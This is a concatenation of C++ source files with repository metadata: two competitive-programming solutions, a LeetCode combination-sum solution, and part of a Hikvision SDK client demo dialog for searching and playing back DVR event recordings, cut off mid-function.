#include <bits/stdc++.h> using namespace std; #ifdef LOCAL #include "trace.h" #else #define trace(args...) #endif using ll = long long; using ld = long double; using pii = pair<int, int>; using vi = vector<int>; #define mp make_pair #define ub upper_bound #define lb lower_bound #define fi first #define se second #define pb push_back #define eb emplace_back #define all(v) (v).begin(), (v).end() void solve(int test) { int n; cin >> n; vector<int> a(n); for (int& e : a) cin >> e; vector<string> ans(n + 1); for (int i = 0; i < 52; i++) ans[0] += 'a'; for (int i = 0; i < n; i++) { for (int j = 0; j < a[i]; j++) ans[i + 1] += ans[i][j]; char nc = 'a'; for (int ch = 0; ch < 26; ch++) if (ans[i][a[i]] - 'a' != ch) { nc = ch + 'a'; break; } for (int j = a[i]; j < 52; j++) ans[i + 1] += nc; } for (int i = 0; i <= n; i++) cout << ans[i] << '\n'; } int main() { ios_base::sync_with_stdio(false); cin.tie(NULL); cout.tie(NULL); int t = 1; cin >> t; for (int i = 1; i <= t; i++) { // cout << "Case #" << i << ": "; solve(i); // cout << "\n"; } }
704f1d2b2faed6994bce0a415e304703e2381026
fa274ec4f0c66c61d6acd476e024d8e7bdfdcf54
/Resoluções OJ/coj/3388.cpp
43f27608d32a93fc90813a1682c4712f62f223c8
[]
no_license
luanaamorim04/Competitive-Programming
1c204b9c21e9c22b4d63ad425a98f4453987b879
265ad98ffecb304524ac805612dfb698d0a419d8
refs/heads/master
2023-07-13T03:04:51.447580
2021-08-11T00:28:57
2021-08-11T00:28:57
null
0
0
null
null
null
null
UTF-8
C++
false
false
559
cpp
#include<bits/stdc++.h> #define _ ios_base::sync_with_stdio(0); #define INF 0x3f3f3f3f #define eb emplace_back #define ll long long #define vl vector<ll> #define vvl vector<vl> #define vi vector<int> #define vvi vector<vi> #define TAM (n+1) #define MOD 303700049 using namespace std; string n,m; int ans; int main(){_ while (cin>>n){ for (ans=0; atoi(n.c_str()); ++ans){ m = n; sort(m.begin(),m.end()); n = to_string(atoi(n.c_str())-atoi(m.c_str())); } cout<<ans<<endl; } return 0; }
6b4de76e90ea27a35a068a61dc4599d6218f9bac
91d0e8ce292ac8d39169181e1644fff2bc909c1c
/backtracking/40_combination_sum_2.cpp
43c627dd431887bb0626761781fd6ea73f977094
[]
no_license
taylortao/myLeetcode
706cff8652a6d96a47981575e67e067f9c4a6a29
d0f5a3a92da4a787af65e5ae82b39fbb46bb3b1c
refs/heads/master
2022-01-01T11:23:10.169347
2021-12-30T04:14:29
2021-12-30T04:14:29
63,123,307
2
0
null
null
null
null
UTF-8
C++
false
false
1,881
cpp
class Solution { public: vector<vector<int>> combinationSum2(vector<int>& candidates, int target) { int cnt = candidates.size(); sort(candidates.begin(), candidates.end()); vector<int> initSolution; Dfs(candidates, initSolution, cnt, target, 0); return solution; } private: vector<vector<int>> solution; void Dfs(const vector<int>& candidates, vector<int>& crtSolution, int cnt, int target, int index) { if (index >= cnt) { return; } int maxIndexCnt = 1; while (index + maxIndexCnt < cnt && candidates[index + maxIndexCnt] == candidates[index]) { maxIndexCnt ++; } for (int i=0; i<=maxIndexCnt; i++) { int targetLeft = target - (candidates[index] * i); for (int j=0; j<i; j++) { crtSolution.push_back(candidates[index]); } if (targetLeft == 0) { solution.push_back(crtSolution); } else if (targetLeft > 0) { Dfs(candidates, crtSolution, cnt, targetLeft, index + maxIndexCnt); } for (int j=0; j<i; j++) { crtSolution.pop_back(); } } } }; /*** another ***/ class Solution { public: vector<vector<int>> combinationSum2(vector<int>& candidates, int target) { int cnt = candidates.size(); sort(candidates.begin(), candidates.end()); vector<int> initSolution; Dfs(candidates, initSolution, cnt, target, 0); return solution; } private: vector<vector<int>> solution; void Dfs(const vector<int>& candidates, vector<int>& crtSolution, int cnt, int target, int index) { if (target == 0) { solution.push_back(crtSolution); } if (index >= cnt) { return; } for (int i=index; i<cnt; i++) { if (i > 0 && candidates[i] == candidates[i-1] && i > index) continue; // remove duplicate if (target >= candidates[i]) { crtSolution.push_back(candidates[i]); Dfs(candidates, crtSolution, cnt, target-candidates[i], i + 1); crtSolution.pop_back(); } } } };
[ "taotingting" ]
taotingting
d76b67afb792b00c31c22964c61fd6cc6d6d3404
a9ec153f7e79a4e08fd54bd7a0ce511a282b6e7b
/drv/EN-Network_Client_SDK_win_x32/ClientDemo/DlgPlayEvent.cpp
bcb9fe6de76e9e34d97daf395d4998e5954b51bb
[]
no_license
stepabogdanov/HikvisionSDK
5d227747127716cbfb6f4c8e721927645e0f67eb
e00da32d00d07dd64023176f11ac4f3731fd4176
refs/heads/master
2021-04-28T07:51:33.245528
2018-10-22T09:16:46
2018-10-22T09:16:46
122,234,801
0
0
null
null
null
null
GB18030
C++
false
false
65,808
cpp
/********************************************************** FileName: DlgPlayEvent.cpp Description: remote event play back Date: 2009/05/17 Note: Modification History: <version> <time> <desc> <1.0 > <2009/05/17> <created> ***********************************************************/ #include "stdafx.h" #include "ClientDemo.h" #include "DlgPlayEvent.h" // CDlgPlayEvent dialog //BOOL g_bRmtCapPic = FALSE; CDlgPlayEvent* g_pDlgPlayEvent; char szEventMap[][32] = { "TRAVERSE_PLANE", "ENTER_AREA", "EXIT_AREA", "INTRUSION", "LOITER", "LEFT_TAKE", "PARKING", "RUN", "High DENSITY", "STICK UP", "INSTALL SCANNER", "OPERATE OVERTIME", "FACE DETECT", "LEFT", "TAKE", "LEAVE_POSITION", "TRAIL", "NULL", "NULL", "FALL_DOWN", "OBJECT_PASTE", "FACE_CAPTURE", "MULTI_FACES", "AUDIO_ABNORMAL" }; //#define CALLBACK_PLAY /********************************************************* Function: PlayDataCallBack Description: Input: lPlayHandle, playback handle;dwDataType,data type,data head or stream;pBuffer,data buffer;dwBufSize,data size;dwUser,user data; Output: Return: **********************************************************/ extern void CALLBACK PlayDataCallBack(LONG lRealHandle, DWORD dwDataType, BYTE *pBuffer,DWORD dwBufSize,DWORD dwUser); /********************************************************* Function: GetEventThread Desc: Input: pParam, point to event dialog Output: Return: **********************************************************/ UINT GetEventThread(LPVOID pParam) { LONG lRet = -1; NET_DVR_SEARCH_EVENT_RET struEventInfo; char szTmp[36] = {0}; char szTmp1[36] = {0}; char szDetail[256] = {0}; char szLan[1024] = {0}; int iSize = 0; int i = 0; int iCount = 0; while (g_pDlgPlayEvent->m_IsQuit) { memset(&struEventInfo, 0, sizeof(NET_DVR_SEARCH_EVENT_RET)); lRet = NET_DVR_FindNextEvent(g_pDlgPlayEvent->m_lFileHandle, &struEventInfo); if (lRet == NET_DVR_FILE_SUCCESS) { switch(struEventInfo.wMajorType) { case EVENT_MOT_DET: sprintf(szTmp, "Motdet"); sprintf(szTmp1, "%d",struEventInfo.uSeniorRet.struMotionRet.dwMotDetNo); break; case EVENT_ALARM_IN: sprintf(szTmp, "AlarmIn "); sprintf(szTmp1, "%d",struEventInfo.uSeniorRet.struAlarmRet.dwAlarmInNo); break; case EVENT_VCA_BEHAVIOR: if (struEventInfo.wMinorType == 20) { strncpy(szEventMap[struEventInfo.wMinorType], "Object Paste", sizeof(szEventMap[struEventInfo.wMinorType])); } sprintf(szTmp, "Vca Behavior %s", szEventMap[struEventInfo.wMinorType]); sprintf(szTmp1, "ch%d rule%d %s",struEventInfo.uSeniorRet.struVcaRet.dwChanNo, struEventInfo.uSeniorRet.struVcaRet.byRuleID,\ (char *)(struEventInfo.uSeniorRet.struVcaRet.byRuleName)); break; default: sprintf(szTmp, "Unknown Event%d", struEventInfo.wMajorType); break; } g_pDlgPlayEvent->m_listRemoteFile.InsertItem(g_pDlgPlayEvent->m_iFileNum, szTmp,0); g_pDlgPlayEvent->m_listRemoteFile.SetItemText(g_pDlgPlayEvent->m_iFileNum, 3, szTmp1); sprintf(szTmp, "%04d%02d%02d%02d%02d%02d",struEventInfo.struStartTime.dwYear, \ struEventInfo.struStartTime.dwMonth, struEventInfo.struStartTime.dwDay, \ struEventInfo.struStartTime.dwHour, struEventInfo.struStartTime.dwMinute,\ struEventInfo.struStartTime.dwSecond); g_pDlgPlayEvent->m_listRemoteFile.SetItemText(g_pDlgPlayEvent->m_iFileNum, 1, szTmp); sprintf(szTmp, "%04d%02d%02d%02d%02d%02d", struEventInfo.struEndTime.dwYear, struEventInfo.struEndTime.dwMonth,\ struEventInfo.struEndTime.dwDay, struEventInfo.struEndTime.dwHour, \ struEventInfo.struEndTime.dwMinute, struEventInfo.struEndTime.dwSecond); g_pDlgPlayEvent->m_listRemoteFile.SetItemText(g_pDlgPlayEvent->m_iFileNum, 2, szTmp); memset(szDetail, 0, 256); iSize = 0; for (i=0; i<MAX_CHANNUM_V30; i++) { if (struEventInfo.byChan[i]) { iSize++; sprintf(szDetail+iSize*3, "%2d,", i); } } g_pDlgPlayEvent->m_listRemoteFile.SetItemText(g_pDlgPlayEvent->m_iFileNum, 4, szDetail); g_pDlgPlayEvent->m_iFileNum++; TRACE("%d\n", g_pDlgPlayEvent->m_iFileNum); } else { if (lRet == NET_DVR_ISFINDING) { Sleep(5); continue; } if ((lRet == NET_DVR_NOMOREFILE) || (lRet == NET_DVR_FILE_NOFIND)) { g_StringLanType(szLan, "查找", "Search"); g_pDlgPlayEvent->GetDlgItem(IDC_BTN_EVENT_SEARCH_LIST)->SetWindowText(szLan); g_pDlgPlayEvent->m_bSearching = FALSE; (g_pDlgPlayEvent->GetDlgItem(IDC_STATIC_EVENT_SEARCH_STATE))->ShowWindow(SW_HIDE); if (g_pDlgPlayEvent->m_iFileNum > 0) { g_pMainDlg->AddLog(g_pDlgPlayEvent->m_iDeviceIndex, OPERATION_SUCC_T, "NET_DVR_FindNextEvent file num[%d]", g_pDlgPlayEvent->m_iFileNum); g_StringLanType(szLan, "获取文件列表成功, 所有文件已列出", "Finish to get file list, and documents have all been listed"); AfxMessageBox(szLan); } else { g_StringLanType(szLan, "搜索结束, 没有搜到文件", "Finish to get file list, and There is no record file"); AfxMessageBox(szLan); } g_pDlgPlayEvent->m_iFileNum = 0; if (g_pDlgPlayEvent->m_lPlayHandle == -1) { g_pDlgPlayEvent->SetStopState(); g_pDlgPlayEvent->GetDlgItem(IDC_BTN_EVENT_FILE_PLAY)->EnableWindow(FALSE); } break; } else { g_pDlgPlayEvent->GetDlgItem(IDC_BTN_EVENT_SEARCH_LIST)->SetWindowText("Search"); g_pDlgPlayEvent->m_bSearching = FALSE; (g_pDlgPlayEvent->GetDlgItem(IDC_STATIC_EVENT_SEARCH_STATE))->ShowWindow(SW_HIDE); g_StringLanType(szLan, "由于服务器忙或网络故障, 搜索异常结束", "Since the server is busy, or network failure, abnormal termination of access file list"); AfxMessageBox(szLan); g_pDlgPlayEvent->m_iFileNum = 0; if (g_pDlgPlayEvent->m_lPlayHandle == -1) { g_pDlgPlayEvent->SetStopState(); g_pDlgPlayEvent->GetDlgItem(IDC_BTN_EVENT_FILE_PLAY)->EnableWindow(FALSE); } break; } } } NET_DVR_FindClose(g_pDlgPlayEvent->m_lFileHandle); // TerminateThread(g_pDlgPlayEvent->m_hFileThread, 0); CloseHandle(g_pDlgPlayEvent->m_hFileThread); g_pDlgPlayEvent->m_hFileThread = NULL; return 0; } /********************************************************* Function: CDlgPlayEvent Desc: Constructor Input: Output: Return: **********************************************************/ IMPLEMENT_DYNAMIC(CDlgPlayEvent, CDialog) CDlgPlayEvent::CDlgPlayEvent(CWnd* pParent /*=NULL*/) : CDialog(CDlgPlayEvent::IDD, pParent) , m_ctDateStart(0) , m_ctTimeStart(0) , m_ctDateStop(0) , m_ctTimeStop(0) , m_iDeviceIndex(-1) , m_lLoginID(-1) , m_iChanIndex(-1) , m_lPlayHandle(-1) , m_bDownloading(FALSE) , m_bSearching(FALSE) , m_bFullScreen(FALSE) , m_hFileThread(NULL) , m_lDeviceType(0) , m_bGetMaxTime(FALSE) , m_hPareTabWnd(NULL) , m_hPareDlgWnd(NULL) , m_lDownloadHandle(-1) , m_bPause(FALSE) , m_bSound(FALSE) , m_hPlayWnd(NULL) , m_iFileNum(0) , m_iChanShowNum(0) , m_iMajorType(0) , m_lFileHandle(-1) , m_nFileTime(0) , m_nTotalFrames(0) , m_nTotalSecond(0) , m_nTotalMinute(0) , m_nTotalHour(0) , m_lStartChan(0) , m_bSaveFile(FALSE) , m_bSetFrame(FALSE) , m_iChanNum(0) , m_iItemSel(-1) , m_lPort(-1) , m_iTime(5) , m_IsQuit(TRUE) { memset(m_szFileName, 0, 200); memset(m_szDownLoadFileName, 0, 256); memset(&m_ctDateStart, 0, sizeof(m_ctDateStart)); memset(&m_ctDateStop, 0, sizeof(m_ctDateStop)); m_hPlayEnableIcon = AfxGetApp()->LoadIcon(IDI_PLAY_ENABLE); m_hPlayDisableIcon = AfxGetApp()->LoadIcon(IDI_PLAY_DISABLE); m_hPauseEnableIcon = AfxGetApp()->LoadIcon(IDI_PAUSE_ENABLE); m_hPauseDisableIcon = AfxGetApp()->LoadIcon(IDI_PAUSE_DISABLE); m_hStopEnableIcon = AfxGetApp()->LoadIcon(IDI_STOP_ENABLE); m_hStopDisableIcon = AfxGetApp()->LoadIcon(IDI_STOP_DISABLE); m_hSoundStartIcon= AfxGetApp()->LoadIcon(IDI_SOUND_ENABLE); m_hSoundStopIcon= AfxGetApp()->LoadIcon(IDI_SOUND_DISABLE); m_hGotoHeadDisableIcon = AfxGetApp()->LoadIcon(IDI_GOTOSTART_DISABLE); m_hGotoTailDisableIcon = AfxGetApp()->LoadIcon(IDI_GOTOEND_DISABLE); m_hFastDisableIcon = AfxGetApp()->LoadIcon(IDI_FASTFORWARD_DISABLE); m_hSlowDisableIcon= AfxGetApp()->LoadIcon(IDI_FASTBACKWARD_DISABLE); m_hGotoHeadEnableIcon = AfxGetApp()->LoadIcon(IDI_GOTOSTART_ENABLE); m_hGotoTailEnableIcon = AfxGetApp()->LoadIcon(IDI_GOTOEND_ENABLE); m_hFastEnableIcon = AfxGetApp()->LoadIcon(IDI_FASTFORWARD_ENABLE); m_hSlowEnableIcon = AfxGetApp()->LoadIcon(IDI_FASTBACKWARD_ENABLE); m_hStepEnableIcon= AfxGetApp()->LoadIcon(IDI_STEP_ENABLE); m_hStepDisableIcon = AfxGetApp()->LoadIcon(IDI_STEP_DISABLE); m_hStepBackEnableIcon = AfxGetApp()->LoadIcon(IDI_STEPBACK_ENABLE); m_hStepBackDisableIcon = AfxGetApp()->LoadIcon(IDI_STEPBACK_DISABLE); m_hCaptureIcon = AfxGetApp()->LoadIcon(IDI_PIC); } /********************************************************* Function: ~CDlgPlayEvent Desc: destructor Input: Output: Return: **********************************************************/ CDlgPlayEvent::~CDlgPlayEvent() { } /********************************************************* Function: DoDataExchange Desc: the map between control and variable Input: Output: Return: **********************************************************/ void CDlgPlayEvent::DoDataExchange(CDataExchange* pDX) { CDialog::DoDataExchange(pDX); //{{AFX_DATA_MAP(CDlgPlayEvent) DDX_Control(pDX, IDC_COMBO_RULEID, m_comboRuleID); DDX_Control(pDX, IDC_LIST_CHAN, m_listChan); DDX_Control(pDX, IDC_COMBO_MINOR_EVENT, m_comboMinorEvent); DDX_Control(pDX, IDC_COMBO_MAJOR_EVENT, m_comboMajorType); DDX_DateTimeCtrl(pDX, IDC_COMBO_EVENT_DATE_START, m_ctDateStart); DDX_DateTimeCtrl(pDX, IDC_COMBO_EVENT_TIME_START, m_ctTimeStart); DDX_DateTimeCtrl(pDX, IDC_COMBO_EVENT_DATE_STOP, m_ctDateStop); DDX_DateTimeCtrl(pDX, IDC_COMBO_EVENT_TIME_STOP, m_ctTimeStop); DDX_Control(pDX, IDC_LIST_EVENT_FILE, m_listRemoteFile); DDX_Control(pDX, IDC_STATIC_EVENT_FILE_WND, m_staticPlayWnd); DDX_Control(pDX, IDC_SLIDER_EVENT_FILE_VOLUME, m_sliderVolume); DDX_Text(pDX, IDC_EDIT_TIME, m_iTime); DDV_MinMaxInt(pDX, m_iTime, 0, 60); //}}AFX_DATA_MAP } /********************************************************* Function: BEGIN_MESSAGE_MAP Desc: the map between control and function Input: Output: Return: **********************************************************/ BEGIN_MESSAGE_MAP(CDlgPlayEvent, CDialog) //{{AFX_MSG_MAP(CDlgPlayEvent) ON_BN_CLICKED(IDC_BTN_EVENT_SEARCH_LIST, OnBnClickedBtnRemoteSearchList) ON_NOTIFY(NM_DBLCLK, IDC_LIST_EVENT_FILE, OnNMDblclkListRemoteFile) ON_BN_CLICKED(IDC_BTN_EVENT_FILE_PLAY, OnBnClickedBtnRemoteFilePlay) ON_BN_CLICKED(IDC_BTN_EVENT_FILE_STOP, OnBnClickedBtnRemoteFileStop) ON_BN_CLICKED(IDC_BTN_EVENT_FILE_STOP_SAVE, OnBnClickedBtnRemoteFileStopSave) ON_BN_CLICKED(IDC_BTN_EVENT_FILE_SLOW, OnBnClickedBtnRemoteFileSlow) ON_BN_CLICKED(IDC_BTN_EVENT_FILE_SNATCH_PIC, OnBnClickedBtnRemoteFileSnatchPic) ON_BN_CLICKED(IDC_BTN_EVENT_FILE_STEP, OnBnClickedBtnRemoteFileStep) ON_BN_CLICKED(IDC_BTN_EVENT_FILE_SOUND, OnBnClickedBtnRemoteFileSound) ON_BN_CLICKED(IDC_BTN_EVENT_FILE_FAST, OnBnClickedBtnRemoteFileFast) ON_BN_CLICKED(IDC_BTN_EVENT_FILE_SAVE, OnBnClickedBtnRemoteFileSave) ON_WM_LBUTTONDBLCLK() ON_WM_TIMER() ON_NOTIFY(NM_CLICK, IDC_LIST_EVENT_FILE, OnClickListRemoteFile) ON_WM_DESTROY() ON_WM_CTLCOLOR() ON_NOTIFY(NM_RELEASEDCAPTURE, IDC_SLIDER_EVENT_FILE_VOLUME, OnReleasedcaptureSliderRemoteFileVolume) ON_NOTIFY(NM_CLICK, IDC_LIST_CHAN, OnClickListChan) ON_CBN_SELCHANGE(IDC_COMBO_MAJOR_EVENT, OnSelchangeComboMajorEvent) ON_CBN_SELCHANGE(IDC_COMBO_MINOR_EVENT, OnSelchangeComboMinorEvent) ON_WM_HSCROLL() ON_WM_PAINT() ON_WM_MOVE() ON_WM_CANCELMODE() ON_WM_CAPTURECHANGED() //}}AFX_MSG_MAP END_MESSAGE_MAP() // CDlgPlayEvent message handlers /********************************************************* Function: SetParentWnd Desc: transfer config parent dialog handle Input: hhWnd,point of handle array, parent point number Output: Return: **********************************************************/ void CDlgPlayEvent::SetParentWnd(HWND *hhWnd, int iParentNum) { VERIFY(iParentNum==2); m_hPareDlgWnd=hhWnd[0]; m_hPareTabWnd=hhWnd[1]; } /********************************************************* Function: OnInitDialog Desc: Initialize the dialog Input: Output: Return: **********************************************************/ BOOL CDlgPlayEvent::OnInitDialog() { CDialog::OnInitDialog(); m_listRemoteFile.SetExtendedStyle(m_listRemoteFile.GetExtendedStyle()|LVS_EX_FULLROWSELECT); CRect rc(0, 0, 0, 0); GetParent()->GetClientRect(&rc); ((CTabCtrl*)GetParent())->AdjustRect(FALSE, &rc); MoveWindow(&rc); InitUI(); char szLan[128] = {0}; g_StringLanType(szLan, "主类型", "Major Type"); m_listRemoteFile.InsertColumn(0, szLan,LVCFMT_LEFT,120,-1); // g_StringLanType(szLan, "次类型", "Minor Type"); // m_listRemoteFile.InsertColumn(1, szLan,LVCFMT_LEFT,50,-1); g_StringLanType(szLan, "开始时间", "Start time"); m_listRemoteFile.InsertColumn(1, szLan, LVCFMT_LEFT, 120, -1); g_StringLanType(szLan, "结束时间", "Stop Time"); m_listRemoteFile.InsertColumn(2, szLan, LVCFMT_LEFT, 120, -1); g_StringLanType(szLan, "高级参数", "Senior Param"); m_listRemoteFile.InsertColumn(3, szLan,LVCFMT_LEFT,50,-1); g_StringLanType(szLan, "触发通道", "Invoke Chan"); m_listRemoteFile.InsertColumn(4, szLan,LVCFMT_LEFT,50,-1); m_listChan.SetExtendedStyle(m_listChan.GetExtendedStyle()|LVS_EX_CHECKBOXES); CTime timeCur = CTime::GetCurrentTime(); CTime timeStart(timeCur.GetYear(),timeCur.GetMonth(),timeCur.GetDay(),0,0,0); CTime timeStop(timeCur.GetYear(),timeCur.GetMonth(),timeCur.GetDay(),23,59,59); m_ctDateStart = timeStart; m_ctTimeStart = timeStart; m_ctDateStop = timeStop; m_ctTimeStop = timeStop; m_hPlayWnd = GetDlgItem(IDC_STATIC_EVENT_FILE_WND)->m_hWnd; m_sliderVolume.SetRange(0,100); m_sliderVolume.SetPos(50); GetDlgItem(IDC_STATIC_EVENT_FILE_WND)->GetWindowRect(m_rcWnd); ScreenToClient(m_rcWnd); g_pDlgPlayEvent=this; int index=0; m_comboRuleID.ResetContent(); g_StringLanType(szLan, "全部", "All"); m_comboRuleID.AddString(szLan); m_comboRuleID.SetItemData(index, 0xff); index++; m_comboRuleID.AddString("0"); m_comboRuleID.SetItemData(index, 0); index++; m_comboRuleID.AddString("1"); m_comboRuleID.SetItemData(index, 1); index++; m_comboRuleID.AddString("2"); m_comboRuleID.SetItemData(index, 2); index++; m_comboRuleID.AddString("3"); m_comboRuleID.SetItemData(index, 3); index++; m_comboRuleID.AddString("4"); m_comboRuleID.SetItemData(index, 4); index++; m_comboRuleID.AddString("5"); m_comboRuleID.SetItemData(index, 5); index++; m_comboRuleID.AddString("6"); m_comboRuleID.SetItemData(index, 6); index++; m_comboRuleID.AddString("7"); m_comboRuleID.SetItemData(index, 7); index++; //minor event, now for behavior analysis CheckInitParam(); UpdateMinorEvent(); m_comboMajorType.SetCurSel(0); m_comboMinorEvent.SetCurSel(0); UpdateData(FALSE); return TRUE; } /********************************************************* Function: CheckInitParam Desc: Verify current device's parameters, and initialize the parameter of dialog Input: Output: Return: TRUE,Verify successfully and initialize parameters; FALSE,verify failed and won't initialize parameters; **********************************************************/ BOOL CDlgPlayEvent::CheckInitParam() { int iDeviceIndex = g_pMainDlg->GetCurDeviceIndex(); if (iDeviceIndex == -1) { UpdateData(FALSE); return FALSE; } if ( m_iDeviceIndex == -1 || m_iDeviceIndex != iDeviceIndex) { m_iChanIndex = -1; } int iChanIndex = g_pMainDlg->GetCurChanIndex(); if (iChanIndex == -1) { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_SUCC_T, "set the channel index = 0"); iChanIndex = 0; //AfxMessageBox("please select a channel!"); //UpdateData(FALSE); //return FALSE; } UpdateData(TRUE); char szLan[128] = {0}; m_iDeviceIndex = iDeviceIndex; m_lLoginID = g_struDeviceInfo[m_iDeviceIndex].lLoginID; m_iChanNum = g_struDeviceInfo[m_iDeviceIndex].iDeviceChanNum; m_lDeviceType = g_struDeviceInfo[m_iDeviceIndex].iDeviceType; m_lStartChan = g_struDeviceInfo[m_iDeviceIndex].iStartChan; //reinitialize the parameter when switching channel if (m_iChanIndex != iChanIndex) { m_iChanIndex = iChanIndex; m_iChanShowNum = g_struDeviceInfo[m_iDeviceIndex].struChanInfo[m_iChanIndex].iChannelNO; if (m_lPlayHandle>=0) { StopPlay(); } m_bDownloading=FALSE; m_bSearching = FALSE; m_lPlayHandle = -1; m_bSound=TRUE; m_bPause=FALSE; m_bSetFrame = FALSE; m_bGetMaxTime = FALSE; m_bFullScreen = FALSE; m_bSaveFile = FALSE; //m_hPareDlgWnd = NULL; //m_hPareTabWnd = NULL; m_hFileThread = NULL; m_iFileNum = 0; m_lDownloadHandle = -1; m_nFileTime = 0; m_nTotalFrames = 0; m_nTotalSecond = 0; m_nTotalMinute = 0; m_nTotalHour = 0; m_listRemoteFile.DeleteAllItems(); memset(&m_struEventParam, 0, sizeof(NET_DVR_SEARCH_EVENT_PARAM)); } if (m_lLoginID < 0) { UpdateData(FALSE); return FALSE; } m_comboMajorType.ResetContent(); g_StringLanType(szLan, "移动侦测", "Motion Detect"); m_comboMajorType.AddString(szLan); g_StringLanType(szLan, "报警输入", "Alarm In"); m_comboMajorType.AddString(szLan); g_StringLanType(szLan, "行为分析", "Behavior Analysis"); m_comboMajorType.AddString(szLan); g_StringLanType(szLan, "交通事件", "ITS"); m_comboMajorType.AddString(szLan); // g_StringLanType(szLan, "辅助报警", "Aux Alarm"); // m_comboMajorType.AddString(szLan); m_iMajorType = 0; m_comboMajorType.SetCurSel(m_iMajorType); UpdateMinorEvent(); UpdateChanStatus(); UpdateData(FALSE); return TRUE; } /********************************************************* Function: InitUI Desc: Initial control of dialog Input: Output: Return: **********************************************************/ void CDlgPlayEvent::InitUI() { // Initial button CButton *pButton; m_rcScreen=CRect(0,0,GetSystemMetrics(SM_CXSCREEN),GetSystemMetrics(SM_CYSCREEN)); pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_PLAY); pButton->SetIcon(m_hPlayDisableIcon); pButton->EnableWindow(FALSE); pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_STOP); pButton->SetIcon(m_hStopDisableIcon); pButton->EnableWindow(FALSE); pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_FAST); pButton->SetIcon(m_hFastDisableIcon); pButton->EnableWindow(FALSE); pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_SLOW); pButton->SetIcon(m_hSlowDisableIcon); pButton->EnableWindow(FALSE); pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_STEP); pButton->SetIcon(m_hStepDisableIcon); pButton->EnableWindow(FALSE); pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_SNATCH_PIC); pButton->SetIcon(m_hCaptureIcon); pButton->EnableWindow(FALSE); pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_SOUND); pButton->SetIcon(m_hSoundStopIcon); pButton->EnableWindow(FALSE); } /********************************************************* Function: SetStopState Desc: Change the control status when stop playback Input: Output: Return: **********************************************************/ void CDlgPlayEvent::SetStopState() { CButton *pButton; m_sliderVolume.EnableWindow(FALSE); pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_PLAY); pButton->SetIcon(m_hPlayEnableIcon); pButton->EnableWindow(TRUE); pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_STOP); pButton->SetIcon(m_hStopDisableIcon); pButton->EnableWindow(FALSE); pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_FAST); pButton->SetIcon(m_hFastDisableIcon); pButton->EnableWindow(FALSE); pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_SLOW); pButton->SetIcon(m_hSlowDisableIcon); pButton->EnableWindow(FALSE); pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_STEP); pButton->SetIcon(m_hStepDisableIcon); pButton->EnableWindow(FALSE); pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_SNATCH_PIC); pButton->SetIcon(m_hCaptureIcon); pButton->EnableWindow(FALSE); pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_SOUND); pButton->SetIcon(m_hSoundStopIcon); pButton->EnableWindow(FALSE); pButton = (CButton *)GetDlgItem(IDC_BTN_EVENT_FILE_STEP); pButton->SetIcon(m_hStepDisableIcon); pButton->EnableWindow(FALSE); } /********************************************************* Function: ExitPlayBack Desc: Exit current diaglog and release resource Input: Output: Return: **********************************************************/ void CDlgPlayEvent::ExitPlayBack() { if (m_hFileThread) { TerminateThread(m_hFileThread, 0); CloseHandle(m_hFileThread); m_hFileThread = NULL; NET_DVR_FindClose(m_lFileHandle); } if (m_lPlayHandle!=-1) { NET_DVR_StopPlayBack(m_lPlayHandle); m_lPlayHandle = -1; } Sleep(100); } /********************************************************* Function: ConvertTime Desc: convert between time_t and NET_DVR_TIME Input: void Output: void Return: void **********************************************************/ BOOL ConvertTime(time_t *lpInBuf, LPNET_DVR_TIME pOutBuf, BOOL bInToOut) { if(pOutBuf == NULL || lpInBuf == NULL) { return FALSE; } if (bInToOut) { struct tm *newtime; newtime = localtime(lpInBuf); if (newtime == NULL) { return FALSE; } pOutBuf->dwYear = DWORD(newtime->tm_year+1900); pOutBuf->dwMonth = DWORD (newtime->tm_mon+1); pOutBuf->dwDay = DWORD(newtime->tm_mday); pOutBuf->dwHour = DWORD(newtime->tm_hour); pOutBuf->dwMinute = DWORD(newtime->tm_min); pOutBuf->dwSecond = DWORD(newtime->tm_sec); } else { struct tm newtime = {0}; newtime.tm_year = pOutBuf->dwYear - 1900; newtime.tm_mon = pOutBuf->dwMonth - 1; newtime.tm_mday = pOutBuf->dwDay; newtime.tm_hour = pOutBuf->dwHour; newtime.tm_min = pOutBuf->dwMinute; newtime.tm_sec = pOutBuf->dwSecond; //utc = local time + bias, local time = utc - bias; *lpInBuf = mktime(&newtime); } return TRUE; } /********************************************************* Function: PlayBack Desc: begin play back Input: Output: Return: **********************************************************/ void CDlgPlayEvent::PlayBack() { UpdateData(TRUE); int m_nVerifyret = -1; CString csFileName; int iFileSelPos = 0; HWND hPlayWnd=m_staticPlayWnd.GetSafeHwnd(); POSITION posItem = m_listRemoteFile.GetFirstSelectedItemPosition(); NET_DVR_TIME struStartTime,struStopTime; char szLan[128] = {0}; // remoteplay_info.srcfilename=m_szFileName; if (m_lPlayHandle>=0) { if (NET_DVR_StopPlayBack(m_lPlayHandle)) { g_pMainDlg->AddLog(m_iDeviceIndex, OPERATION_SUCC_T, "NET_DVR_StopPlayBack"); } m_lPlayHandle = -1; Sleep(400); } if (m_lPlayHandle == -1) { m_iChanShowNum = g_struDeviceInfo[m_iDeviceIndex].struChanInfo[m_iChanIndex].iChannelNO; time_t tmp; ConvertTime(&tmp, &m_struStartTime, FALSE); tmp -= m_iTime; ConvertTime(&tmp, &m_struStartTime, TRUE); ConvertTime(&tmp, &m_struStopTime, FALSE); tmp += m_iTime; ConvertTime(&tmp, &m_struStopTime, TRUE); memcpy(&struStartTime, &m_struStartTime, sizeof(NET_DVR_TIME)); memcpy(&struStopTime, &m_struStopTime, sizeof(NET_DVR_TIME)); m_lPlayHandle = NET_DVR_PlayBackByTime(m_lLoginID, m_iChanShowNum, &struStartTime, &struStopTime, 